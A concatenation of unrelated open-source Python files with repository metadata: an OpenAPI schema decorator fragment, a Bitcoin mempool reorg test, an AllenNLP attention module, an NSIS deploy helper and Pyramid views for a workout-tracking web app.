getattr(f, 'schema', None)
# previously set schema with @extend_schema on views methods
or getattr(f, 'kwargs', {}).get('schema', None)
# previously set schema with @extend_schema on @api_view
or getattr(getattr(f, 'cls', None), 'kwargs', {}).get('schema', None)
# the default
or api_settings.DEFAULT_SCHEMA_CLASS
)
if not inspect.isclass(BaseSchema):
BaseSchema = BaseSchema.__class__
def is_in_scope(ext_schema):
version, _ = ext_schema.view.determine_version(
ext_schema.view.request,
**ext_schema.view.kwargs
)
version_scope = versions is None or version in versions
method_scope = methods is None or ext_schema.method in methods
return method_scope and version_scope
class ExtendedSchema(BaseSchema):
def get_operation(self, path, path_regex, path_prefix, method, registry):
self.method = method
if exclude and is_in_scope(self):
return None
if operation is not None and is_in_scope(self):
return operation
return super().get_operation(path, path_regex, path_prefix, method, registry)
def get_operation_id(self):
if operation_id and is_in_scope(self):
return operation_id
return super().get_operation_id()
def get_override_parameters(self):
if parameters and is_in_scope(self):
return super().get_override_parameters() + parameters
return super().get_override_parameters()
def get_auth(self):
if auth and is_in_scope(self):
return auth
return super().get_auth()
def get_examples(self):
if examples and is_in_scope(self):
return examples
return super().get_examples()
def get_request_serializer(self):
if request is not empty and is_in_scope(self):
return request
return super().get_request_serializer()
def get_response_serializers(self):
if responses is not empty and is_in_scope(self):
return responses
return super().get_response_serializers()
def get_description(self):
if description and is_in_scope(self):
return description
return super().get_description()
def get_summary(self):
if summary and is_in_scope(self):
return str(summary)
return super().get_summary()
def is_deprecated(self):
if deprecated and is_in_scope(self):
return deprecated
return super().is_deprecated()
def get_tags(self):
if tags is not None and is_in_scope(self):
return tags
return super().get_tags()
if inspect.isclass(f):
# either direct decoration of views, or unpacked @api_view from OpenApiViewExtension
if operation_id is not None or operation is not None:
error(
f'using @extend_schema on viewset class {f.__name__} with parameters '
f'operation_id or operation will most likely result in a broken schema.'
)
# reorder schema class MRO so that view method annotation takes precedence
# over view class annotation. only relevant if there is a method annotation
for view_method in get_view_methods(view=f, schema=BaseSchema):
if 'schema' in getattr(view_method, 'kwargs', {}):
view_method.kwargs['schema'] = type(
'ExtendedMetaSchema', (view_method.kwargs['schema'], ExtendedSchema), {}
)
# persist schema on class to provide annotation to derived view methods.
# the second purpose is to serve as base for view multi-annotation
f.schema = ExtendedSchema()
return f
elif callable(f) and hasattr(f, 'cls'):
# 'cls' attr signals that as_view() was called, which only applies to @api_view.
# keep a "unused" schema reference at root level for multi annotation convenience.
setattr(f.cls, 'kwargs', {'schema': ExtendedSchema})
# set schema on method kwargs context to emulate regular view behaviour.
for method in f.cls.http_method_names:
setattr(getattr(f.cls, method), 'kwargs', {'schema': ExtendedSchema})
return f
elif callable(f):
# custom actions have kwargs in their context, others don't. create it so our create_view
# implementation can overwrite the default schema
if not hasattr(f, 'kwargs'):
f.kwargs = {}
# this simulates what @action is actually doing. somewhere along the line in this process
# the schema is picked up from kwargs and used. it's involved my dear friends.
# use class instead of instance due to descriptor weakref reverse collisions
f.kwargs['schema'] = ExtendedSchema
return f
else:
return f
return decorator
def extend_schema_field(
field: Union[_SerializerTypeVariations, Dict],
component_name: Optional[str] = None
):
"""
Decorator for the "field" kind. Can be used with ``SerializerMethodField`` (annotate the actual
method) or with custom ``serializers.Field`` implementations.
If your custom serializer field base class is already the desired type, decoration is not necessary.
To override the discovered base class type, you can decorate your custom field class.
Always takes precedence over other mechanisms (e.g. type hints, auto-discovery).
:param field: accepts a ``Serializer``, :class:`~.types.OpenApiTypes` or raw ``dict``
:param component_name: signals that the field should be broken out as separate component
"""
def decorator(f):
set_override(f, 'field', field)
set_override(f, 'field_component_name', component_name)
return f
return decorator
def extend_schema_serializer(
many: Optional[bool] = None,
exclude_fields: Optional[List[str]] = None,
examples: Optional[List[OpenApiExample]] = None,
):
"""
Decorator for the "serializer" kind. Intended for overriding default serializer behaviour that
cannot be influenced through :func:`@extend_schema <.extend_schema>`.
:param many: override how serializer is initialized. Mainly used to coerce the list view detection
heuristic to acknowledge a non-list serializer.
:param exclude_fields: fields to ignore while processing the serializer. only affects the
schema. fields will still be exposed through the API.
:param examples: define example data to serializer.
"""
def decorator(klass):
if many is not None:
set_override(klass, 'many', many)
if exclude_fields:
set_override(klass, 'exclude_fields', exclude_fields)
if examples:
set_override(klass, 'examples', examples)
return klass
return decorator
def extend_schema_view(**kwargs):
"""
Convenience decorator for the "view" kind. Intended for annotating derived view methods that
are are not directly present in the view (usually methods like ``list`` or ``retrieve``).
Spares you from overriding methods like ``list``, only to perform a super call in the body
so that you have have something to attach :func:`@extend_schema <.extend_schema>` to.
This decorator also takes care of safely attaching annotations to derived view methods,
preventing leakage into unrelated views.
:param kwargs: method names as argument names and :func:`@extend_schema <.extend_schema>`
calls as values
"""
def wrapping_decorator(method_decorator, method):
@method_decorator
@functools.wraps(method)
def wrapped_method(self, request, *args, **kwargs):
return method(self, request, *args, **kwargs)
return wrapped_method
def decorator(view):
view_methods = {m.__name__: m for m in get_view_methods(view)}
for method_name, method_decorator in kwargs.items():
if method_name not in view_methods:
warn(
f'@extend_schema_view argument "{method_name}" was not found on view '
f'{view.__name__}. method override for "{method_name}" will be ignored.'
)
continue
method = view_methods[method_name]
# the context of derived methods must not be altered, as it belongs to the other
# class. create a new context via the wrapping_decorator so the schema can be safely
# stored in the wrapped_method. methods belonging to the view can be safely altered.
if method_name in view.__dict__:
method_decorator(method)
else:
setattr(view, method_name, wrapping_decorator(method_decorator, method))
return view
return decorator
def inline_serializer(name: str, fields: Dict[str, Field], **kwargs) -> Serializer:
"""
A helper function to create an inline serializer. Primary use is with
:func:`@extend_schema <.extend_schema>`, where one needs an implicit one-off
serializer that is not reflected in an actual class.
:param name: name of the
:param fields: dict with field names as keys and serializer fields as values
:param kwargs: optional kwargs for serializer initialization
"""
serializer_class = type(name, (Serializer,), fields)
return serializer_class(**kwargs)
| 41.324948 | 104 | 0.641487 |
6f7f577e36cfe50f1e1ed461f6f8a2fc4f900f51 | 3,451 | py | Python | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | qa/rpc-tests/mempool_resurrect_test.py | whiteangelsblack/bitcoinstx | ed75f5c9116c2a91e947998e0b5ffb84c76fa449 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework import BitcoinTestFramework
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
import os
import shutil
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(BitcoinTestFramework):
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
| 38.775281 | 92 | 0.65836 |
1558cbc7b25234558b0f37ad81f3ab4110589317 | 2,357 | py | Python | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 4 | 2019-05-30T01:03:31.000Z | 2021-12-18T08:24:51.000Z | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 123 | 2020-04-26T02:41:30.000Z | 2021-08-02T21:18:00.000Z | allennlp/modules/attention/additive_attention.py | sun-xiaoyu/allennlp | b49aff6aac4e9912564ee8235250d50c9d17e53f | [
"Apache-2.0"
] | 5 | 2019-07-16T06:43:50.000Z | 2021-12-18T08:25:12.000Z | from overrides import overrides
import torch
from torch.nn.parameter import Parameter
from allennlp.modules.attention.attention import Attention
@Attention.register("additive")
class AdditiveAttention(Attention):
"""
Computes attention between a vector and a matrix using an additive attention function. This
function has two matrices `W`, `U` and a vector `V`. The similarity between the vector
`x` and the matrix `y` is computed as `V tanh(Wx + Uy)`.
This attention is often referred as concat or additive attention. It was introduced in
<https://arxiv.org/abs/1409.0473> by Bahdanau et al.
Registered as an `Attention` with name "additive".
# Parameters
vector_dim : `int`, required
The dimension of the vector, `x`, described above. This is `x.size()[-1]` - the length
of the vector that will go into the similarity computation. We need this so we can build
the weight matrix correctly.
matrix_dim : `int`, required
The dimension of the matrix, `y`, described above. This is `y.size()[-1]` - the length
of the vector that will go into the similarity computation. We need this so we can build
the weight matrix correctly.
normalize : `bool`, optional (default : `True`)
If true, we normalize the computed similarities with a softmax, to return a probability
distribution for your attention. If false, this is just computing a similarity score.
"""
def __init__(self, vector_dim: int, matrix_dim: int, normalize: bool = True) -> None:
super().__init__(normalize)
self._w_matrix = Parameter(torch.Tensor(vector_dim, vector_dim))
self._u_matrix = Parameter(torch.Tensor(matrix_dim, vector_dim))
self._v_vector = Parameter(torch.Tensor(vector_dim, 1))
self.reset_parameters()
def reset_parameters(self):
torch.nn.init.xavier_uniform_(self._w_matrix)
torch.nn.init.xavier_uniform_(self._u_matrix)
torch.nn.init.xavier_uniform_(self._v_vector)
@overrides
def _forward_internal(self, vector: torch.Tensor, matrix: torch.Tensor) -> torch.Tensor:
intermediate = vector.matmul(self._w_matrix).unsqueeze(1) + matrix.matmul(self._u_matrix)
intermediate = torch.tanh(intermediate)
return intermediate.matmul(self._v_vector).squeeze(2)
| 45.326923 | 97 | 0.705558 |
8cc69d55fb5c5dae6d1fd12ec9569bab7e59fdb7 | 376 | py | Python | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | deploy/nsis.py | roman-st/DeployTool | af6bda37ef84f06358c875f4d07609287432c4f3 | [
"MIT"
] | null | null | null | from install import RemoteInstaller
def install(remoteInstaller, setup, install_path):
install_cmd = '{0} /S /D={1}'.format(setup, install_path)
return remoteInstaller.install(install_cmd)
def uninstall(remoteInstaller, uninstaller, install_path):
uninstall_cmd = '{0}/{1} /S'.format(install_path, uninstaller)
return remoteInstaller.uninstall(uninstall_cmd) | 41.777778 | 66 | 0.768617 |
3b733cc0b14f1bfc642057dabbe213bc782291f7 | 52 | py | Python | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 1 | 2020-02-04T21:18:31.000Z | 2020-02-04T21:18:31.000Z | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 12 | 2020-01-01T11:46:33.000Z | 2022-03-12T00:10:01.000Z | app/purchase/tests/__init__.py | phessabi/eshop | 6a5352753a0c27f9c3f0eda6eec696f49ef4a8eb | [
"Apache-2.0"
] | 1 | 2020-02-18T11:12:48.000Z | 2020-02-18T11:12:48.000Z | from .api_tests.purchase import PurchaseAPITestCase
| 26 | 51 | 0.884615 |
b13c2ff6119f163151e3a139863c64f3bc4e9f64 | 18,331 | py | Python | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | 3 | 2019-02-15T11:38:20.000Z | 2020-10-03T19:03:51.000Z | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | null | null | null | ow/views/user.py | openworkouts/OpenWorkouts | ecfed69e8c654c09bb8c074d8aedda9c13cd2235 | [
"BSD-3-Clause"
] | null | null | null | import json
from datetime import datetime, timezone, timedelta
from decimal import Decimal
from io import BytesIO
from pyramid.httpexceptions import HTTPFound, HTTPNotFound
from pyramid.view import view_config
from pyramid.security import remember, forget
from pyramid.response import Response
from pyramid.i18n import TranslationStringFactory, get_localizer
from pyramid_simpleform import Form, State
from pytz import common_timezones
from PIL import Image
from ..models.user import User
from ..schemas.user import (
UserProfileSchema,
ChangePasswordSchema,
SignUpSchema,
)
from ..models.root import OpenWorkouts
from ..views.renderers import OWFormRenderer
from ..utilities import (
timedelta_to_hms,
get_verification_token,
get_gender_names,
get_available_locale_names,
get_month_names,
get_week_day_names
)
from ..mail import send_verification_email
_ = TranslationStringFactory('OpenWorkouts')
month_name = get_month_names()
weekday_name = get_week_day_names()
@view_config(context=OpenWorkouts)
def dashboard_redirect(context, request):
"""
Send the user to his dashboard when accesing the root object,
send to the login page if the user is not logged in.
"""
if request.authenticated_userid:
user = request.root.get_user_by_uid(request.authenticated_userid)
if user:
return HTTPFound(location=request.resource_url(user))
else:
# an authenticated user session, for an user that does not exist
# anymore, logout!
return HTTPFound(location=request.resource_url(context, 'logout'))
return HTTPFound(location=request.resource_url(context, 'login'))
@view_config(
context=OpenWorkouts,
name='login',
renderer='ow:templates/login.pt')
def login(context, request):
# messages is a dict of pre-defined messages we would need to show to the
# user when coming back to the login page after certain actions
messages = {
'already-verified': _('User has been verified already'),
'link-sent': _('Verification link sent, please check your inbox'),
'max-tokens-sent': _(
'We already sent you the verification link more than three times')
}
message = request.GET.get('message', '')
if message:
message = messages.get(message, '')
email = request.GET.get('email', '')
password = ''
return_to = request.params.get('return_to')
redirect_url = return_to or request.resource_url(request.root)
# If the user still has to verify the account, this will be set to the
# proper link to re-send the verification email
resend_verify_link = None
if 'submit' in request.POST:
email = request.POST.get('email', None)
user = context.get_user_by_email(email)
if user:
if user.verified:
password = request.POST.get('password', None)
if password is not None and user.check_password(password):
# look for the value of locale for this user, to set the
# LOCALE cookie, so the UI appears on the pre-selected lang
default_locale = request.registry.settings.get(
'pyramid.default_locale_name')
locale = getattr(user, 'locale', default_locale)
request.response.set_cookie('_LOCALE_', locale)
# log in the user and send back to the place he wanted to
# visit
headers = remember(request, str(user.uid))
request.response.headers.extend(headers)
redirect_url = return_to or request.resource_url(user)
return HTTPFound(location=redirect_url,
headers=request.response.headers)
else:
message = _('Wrong password')
else:
message = _('You have to verify your account first')
resend_verify_link = request.resource_url(
user, 'resend-verification-link'
)
else:
message = _('Wrong email address')
return {
'message': message,
'email': email,
'password': password,
'redirect_url': redirect_url,
'resend_verify_link': resend_verify_link
}
@view_config(context=OpenWorkouts, name='logout')
def logout(context, request):
request.response.delete_cookie('_LOCALE_')
headers = forget(request)
request.response.headers.extend(headers)
return HTTPFound(location=request.resource_url(context),
headers=request.response.headers)
@view_config(
context=OpenWorkouts,
name='signup',
renderer='ow:templates/signup.pt')
def signup(context, request):
state = State(emails=context.lowercase_emails,
names=context.lowercase_nicknames)
form = Form(request, schema=SignUpSchema(), state=state)
if 'submit' in request.POST and form.validate():
user = form.bind(User(), exclude=['password_confirm'])
user.verified = False
user.verification_token = get_verification_token()
context.add_user(user)
# send a verification link to the user email address
send_verification_email(request, user)
user.verification_tokens_sent += 1
# Send to login
return HTTPFound(location=request.resource_url(context))
return {
'form': OWFormRenderer(form)
}
@view_config(
context=User,
name="verify",
renderer='ow:templates/verify.pt')
def verify(context, request):
redirect_url = request.resource_url(context)
# user has been verified already, send to dashboard
if getattr(context, 'verified', False):
return HTTPFound(location=redirect_url)
# Look for a verification token, then check if we can verify the user with
# that token
verified = len(request.subpath) > 0
token = getattr(context, 'verification_token', False)
verified = verified and token and str(token) == request.subpath[0]
if verified:
# verified, log in automatically and send to the dashboard
context.verified = True
headers = remember(request, str(context.uid))
return HTTPFound(location=redirect_url, headers=headers)
# if we can not verify the user, show a page with some info about it
return {}
@view_config(
context=User,
name="resend-verification-link")
def resend_verification_link(context, request):
"""
Send an email with the verification link, only if the user has not
been verified yet
"""
# the message to be shown when the user gets back to the login page
query = {'message': 'already-verified'}
if not context.verified:
tokens_sent = getattr(context, 'verification_tokens_sent', 0)
if tokens_sent > 3:
# we already sent the token 3 times, we don't send it anymore
query = {'message': 'max-tokens-sent', 'email': context.email}
else:
if context.verification_token is None:
# for some reason the verification token is not there, get one
context.verification_token = get_verification_token()
send_verification_email(request, context)
context.verification_tokens_sent = tokens_sent + 1
query = {'message': 'link-sent', 'email': context.email}
# Send to login
url = request.resource_url(request.root, 'login', query=query)
return HTTPFound(location=url)
@view_config(
context=OpenWorkouts,
name='forgot-password',
renderer='ow:templates/forgot_password.pt')
def recover_password(context, request): # pragma: no cover
# WIP
Form(request)
@view_config(
context=User,
permission='view',
renderer='ow:templates/dashboard.pt')
def dashboard(context, request):
"""
Render a dashboard for the current user
"""
# Look at the year we are viewing, if none is passed in the request,
# pick up the latest/newer available with activity
viewing_year = request.GET.get('year', None)
if viewing_year is None:
available_years = context.activity_years
if available_years:
viewing_year = available_years[0]
else:
# ensure this is an integer
viewing_year = int(viewing_year)
# Same for the month, if there is a year set
viewing_month = None
if viewing_year:
viewing_month = request.GET.get('month', None)
if viewing_month is None:
available_months = context.activity_months(viewing_year)
if available_months:
# we pick up the latest month available for the year,
# which means the current month in the current year
viewing_month = available_months[-1]
else:
# ensure this is an integer
viewing_month = int(viewing_month)
# pick up the workouts to be shown in the dashboard
workouts = context.workouts(viewing_year, viewing_month)
return {
'current_year': datetime.now(timezone.utc).year,
'current_day_name': datetime.now(timezone.utc).strftime('%a'),
'month_name': month_name,
'viewing_year': viewing_year,
'viewing_month': viewing_month,
'workouts': workouts
}
@view_config(
context=OpenWorkouts,
name='profile',
permission='view',
renderer='ow:templates/profile.pt')
@view_config(
context=User,
permission='view',
name='profile',
renderer='ow:templates/profile.pt')
def profile(context, request):
"""
"public" profile view, showing some workouts from this user, her
basic info, stats, etc
"""
if isinstance(context, OpenWorkouts):
nickname = request.subpath[0]
user = request.root.get_user_by_nickname(nickname)
if user is None:
return HTTPNotFound()
else:
user = context
now = datetime.now(timezone.utc)
year = int(request.GET.get('year', now.year))
month = int(request.GET.get('month', now.month))
week = request.GET.get('week', None)
workouts = user.workouts(year, month, week)
totals = {
'distance': Decimal(0),
'time': timedelta(0),
'elevation': Decimal(0)
}
for workout in workouts:
totals['distance'] += (
getattr(workout, 'distance', Decimal(0)) or Decimal(0))
totals['time'] += (
getattr(workout, 'duration', timedelta(0)) or timedelta(0))
totals['elevation'] += (
getattr(workout, 'uphill', Decimal(0)) or Decimal(0))
localizer = get_localizer(request)
user_gender = _('Unknown')
for g in get_gender_names():
if g[0] == user.gender:
user_gender = localizer.translate(g[1])
return {
'user': user,
'user_gender': user_gender,
'workouts': workouts,
'current_month': '{year}-{month}'.format(
year=str(year), month=str(month).zfill(2)),
'current_week': week,
'totals': totals
}
@view_config(
context=User,
name='picture',
permission='view')
def profile_picture(context, request):
if context.picture is None:
return HTTPNotFound()
size = request.GET.get('size', 0)
# we will need a tuple, it does not matter if both values are the same,
# Pillow will keep aspect ratio
size = (int(size), int(size))
image = Image.open(context.picture.open())
if size > (0, 0) and size < image.size:
# resize only if they are asking for smaller size, prevent
# someone asking for a "too big" image
image.thumbnail(size)
body_file = BytesIO()
image.save(body_file, format=image.format)
return Response(content_type='image', body=body_file.getvalue())
@view_config(
context=User,
permission='edit',
name='edit',
renderer='ow:templates/edit_profile.pt')
def edit_profile(context, request):
default_locale = request.registry.settings.get(
'pyramid.default_locale_name')
current_locale = request.cookies.get('_LOCALE_', default_locale)
# if not given a file there is an empty byte in POST, which breaks
# our blob storage validator.
# dirty fix until formencode fixes its api.is_empty method
if isinstance(request.POST.get('picture', None), bytes):
request.POST['picture'] = ''
nicknames = request.root.lowercase_nicknames
if context.nickname:
# remove the current user nickname from the list, preventing form
# validation error
nicknames.remove(context.nickname.lower())
state = State(emails=request.root.lowercase_emails, names=nicknames)
form = Form(request, schema=UserProfileSchema(), state=state, obj=context)
if 'submit' in request.POST and form.validate():
# No picture? do not override it
if not form.data['picture']:
del form.data['picture']
form.bind(context)
# reindex
request.root.reindex(context)
# set the cookie for the locale/lang
request.response.set_cookie('_LOCALE_', form.data['locale'])
current_locale = form.data['locale']
# Saved, send the user to the public view of her profile
return HTTPFound(location=request.resource_url(context, 'profile'),
headers=request.response.headers)
# prevent crashes on the form
if 'picture' in form.data:
del form.data['picture']
localizer = get_localizer(request)
gender_names = [
(g[0], localizer.translate(g[1])) for g in get_gender_names()]
available_locale_names = [
(l[0], localizer.translate(l[1])) for l in get_available_locale_names()
]
return {'form': OWFormRenderer(form),
'timezones': common_timezones,
'gender_names': gender_names,
'available_locale_names': available_locale_names,
'current_locale': current_locale}
@view_config(
context=User,
permission='edit',
name='passwd',
renderer='ow:templates/change_password.pt')
def change_password(context, request):
form = Form(request, schema=ChangePasswordSchema(),
state=State(user=context))
if 'submit' in request.POST and form.validate():
context.password = form.data['password']
return HTTPFound(location=request.resource_url(context, 'profile'))
return {'form': OWFormRenderer(form)}
@view_config(
context=User,
permission='view',
name='week')
def week_stats(context, request):
localizer = get_localizer(request)
stats = context.week_stats
json_stats = []
for day in stats:
hms = timedelta_to_hms(stats[day]['time'])
name = localizer.translate(weekday_name[day.weekday()])[:3]
day_stats = {
'name': name,
'time': str(hms[0]).zfill(2),
'distance': int(round(stats[day]['distance'])),
'elevation': int(stats[day]['elevation']),
'workouts': stats[day]['workouts']
}
json_stats.append(day_stats)
return Response(content_type='application/json',
charset='utf-8',
body=json.dumps(json_stats))
@view_config(
context=User,
permission='view',
name='monthly')
def last_months_stats(context, request):
"""
Return a json-encoded stream with statistics for the last 12 months
"""
localizer = get_localizer(request)
stats = context.yearly_stats
# this sets which month is 2 times in the stats, once this year, once
# the previous year. We will show it a bit different in the UI (showing
# the year too to prevent confusion)
repeated_month = datetime.now(timezone.utc).date().month
json_stats = []
for month in stats:
hms = timedelta_to_hms(stats[month]['time'])
name = localizer.translate(month_name[month[1]])[:3]
if month[1] == repeated_month:
name += ' ' + str(month[0])
month_stats = {
'id': str(month[0]) + '-' + str(month[1]).zfill(2),
'name': name,
'time': str(hms[0]).zfill(2),
'distance': int(round(stats[month]['distance'])),
'elevation': int(stats[month]['elevation']),
'workouts': stats[month]['workouts'],
'url': request.resource_url(
context, 'profile',
query={'year': str(month[0]), 'month': str(month[1])})
}
json_stats.append(month_stats)
return Response(content_type='application/json',
charset='utf-8',
body=json.dumps(json_stats))
@view_config(
context=User,
permission='view',
name='weekly')
def last_weeks_stats(context, request):
"""
Return a json-encoded stream with statistics for the last 12-months, but
in a per-week basis
"""
localizer = get_localizer(request)
stats = context.weekly_year_stats
# this sets which month is 2 times in the stats, once this year, once
# the previous year. We will show it a bit different in the UI (showing
# the year too to prevent confusion)
repeated_month = datetime.now(timezone.utc).date().month
json_stats = []
for week in stats:
hms = timedelta_to_hms(stats[week]['time'])
name = localizer.translate(month_name[week[1]])[:3]
if week[1] == repeated_month:
name += ' ' + str(week[0])
week_stats = {
'id': '-'.join(
[str(week[0]), str(week[1]).zfill(2), str(week[2])]),
'week': str(week[3]), # the number of week in the current month
'name': name,
'time': str(hms[0]).zfill(2),
'distance': int(round(stats[week]['distance'])),
'elevation': int(stats[week]['elevation']),
'workouts': stats[week]['workouts'],
'url': request.resource_url(
context, 'profile',
query={'year': str(week[0]),
'month': str(week[1]),
'week': str(week[2])})
}
json_stats.append(week_stats)
return Response(content_type='application/json',
charset='utf-8',
body=json.dumps(json_stats))
| 35.732943 | 79 | 0.632644 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.